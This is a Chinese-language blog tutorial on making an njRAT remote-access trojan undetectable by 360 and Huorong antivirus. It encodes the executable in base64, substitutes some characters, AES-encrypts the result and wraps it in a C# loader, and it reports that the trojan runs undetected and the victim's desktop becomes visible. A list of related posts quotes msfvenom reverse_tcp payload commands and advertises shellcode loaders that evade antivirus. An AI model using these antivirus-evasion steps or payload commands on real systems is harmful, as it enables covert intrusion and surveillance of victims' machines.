绕过杀软(二)——免杀exe文件(360、火绒免杀)
实验环境
攻击机: win7 IP: 192.168.32.134
靶机: windows server 2012(安装360、火绒) IP: 192.168.32.133
一、生成客户端exe木马
第一步:使用njRAT生产一个客户端exe木马
输入回连端口号8888,点击start
配置客户端木马的回连地址:192.168.32.134
将文件保存在桌面
开启360杀毒,直接报毒,不免杀
二、对客户端exe木马使用加解密替换方法进行免杀
1、将生成的客户端木马:Server.exe在 Encryption Tool V3.0中以base64加密方式打开
打开之后,将base64加密之后的文件中的所有字母A替换成#
将base64加密之后的文件中的所有字母T替换成*
替换完成之后,保存成1.txt文件
将1.txt文件中的内容,复制粘贴到下图所示位置
添加该程序代码需要的引用文件
按照下图所示,添加完引用文件之后,点击确定
点击 Properties 按照下图所示配置好,将此代码生成控制台应用程序
点击生成,如下图所示表示客户端程序exe程序生成完成
将生成的程序 CsharpEncryptionDecryptor.exe 复制到带有 360、火绒杀软的服务器中,并且开启杀软进行查杀,均未报毒,成功免杀
在靶机中双击免杀的客户端exe文件:CsharpEncryptionDecryptor.exe
在win7电脑上查看,发现靶机成功上线
查看靶机的电脑桌面
免杀原理:
将生成的客户端exe文件,进行base64编码,然后将base64编码之后的文本中的A替换成#,T替换成*,之后使用AES算法再次进行加密。以此绕过免杀
更多资源:
1、web安全工具、渗透测试工具、免杀工具
2、存在漏洞的网站源码与代码审计+漏洞复现教程、
3、渗透测试学习视频、应急响应学习视频、代码审计学习视频
4、应急响应真实案例复现靶场与应急响应教程
收集整理在知识星球,可加入知识星球进行查看。也可搜索关注微信公众号:W小哥
绕过杀软(二)——免杀exe文件(360、火绒免杀)相关推荐
- 免杀Bypass!可过WDF/360/火绒的C#混淆器
0x01 工具简介 这次分享的是一个可用于免杀过WDF/360/火绒的C#混淆器,但只能混淆.Net Framework应用程序.作者写这个工具主要是为了了解更多关于 C# 和混淆器的工作原理. 关注 ...
- Metasploit+python生成免杀exe过360杀毒
Metasploit+python生成免杀exe过360杀毒 1在kali下生成一个反弹的msf的python脚本,命令如下: msfvenom -p windows/meterpreter/reve ...
- 【工具分享】免杀360火绒的shellcode加载器
微信公众号:乌鸦安全 扫取二维码获取更多信息! 1. 免杀效果 该shellcode加载器目前可以过360&火绒,Windows Defender没戏... 代码和思路暂不开源! 你可以在我的 ...
- 二进制免杀-火绒免杀研究
┌──(kali㉿kali)-[~] └─$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.93.134 lport=44 ...
- Veil+tdm-gcc免杀360火绒瑞星
Veil-Evasion是一个用python写的免杀框架,可以将任意脚本或一段shellcode转换成Windows可执行文件,还能利用Metasploit框架生成相兼容的Payload工具,从而逃避 ...
- 2023最新使用python进行shellcode免杀过360火绒 ,反虚拟机
本源码仅供学习交流,不得用于违法范围,本源码已放到QQ交流群 群文件中QQ群:798134185 反虚拟机方案根据虚拟机系统文件 cpu核心数 开机启动时间 c盘大小判断 生成c语言的payloa ...
- 使用WinRAR制作免安装exe文件
WinRAR打包成exe 在"自解压选项"–>"设置"中有"提取后运行"或者"解压后运行"选项(具体取决于rar版 ...
- 新手指南 手把手教你部署火绒企业杀毒
随着企业业务对网络的依赖不断加大,企业对于网络安全的重视程度也在不断提升,但近年来各种网络攻击可以说是屡禁不止,且大有愈演愈烈之势.木马病毒.安全漏洞.勒索软件等一个个耳熟能详的名词成为企业的&quo ...
- 红队培训班作业 | 免杀过360和火绒 四种方法大对比
文章来源|MS08067 红队培训班第12节课作业 本文作者:汤浩荡(红队培训班1期学员) 按老师要求尝试完成布置的作业如下: 环境准备: Kali linux安装cs4.2,Windows7系统安装 ...
- 红队培训班作业 | 五种免杀bypass火绒360姿势横向测评:哪款更适合你?
文章来源|MS08067 红队培训班第12节课作业 本文作者:某学员A(红队培训班1期学员) 按老师要求尝试完成布置的作业如下: 一.远程线程注入 (一)通过MSF生成payload 通过msfven ...
最新文章
- 艺术站-卡通和风格化的HDRI天空
- c语言 swap交换函数_C语言经典100题(14)
- 《游戏引擎架构》笔记十四
- HTML期末学生大作业-乒乓球网页作业html+css+javascript
- Java无所不能的反射在Android中需要熟练的知识
- woocommerce产品选项描述修改_简历修改服务:中文修改、英文修改、中英互译、简历定制,名师一对一指导修改!...
- 【Fudan DISC】一种无监督下利用多模态文档结构信息帮助图片-句子匹配的采样方法...
- .net mysql参数化查询,ASP.NET中的mysql参数化查询
- c语言怎么查找中文字符,C语言自学,汉字编码范围查询!
- 【EDA课程设计】FPGA交通信号灯的设计(含动画视频、超详细思路/步骤分析、完整代码与效果详解)
- 电子海图系统线状符号表达及绘制方法
- Python实现王者农药自动刷金币
- 百度地图和51地图API应用开发
- 已有一个已排好序的数组,要求输入一个数,将它插入数组中,保持数组依然有序。
- Vue 路由导航守卫(全局守卫、路由独享守卫、组件内守卫)详解
- 破解TP-Link路由-嗅探PPPoE拨号密码
- 【android】android真机测试方法
- 用Helm3构建多层微服务
- Indian Summer
- 游戏代理要把用户数据和充值数据牢牢抓在自己手上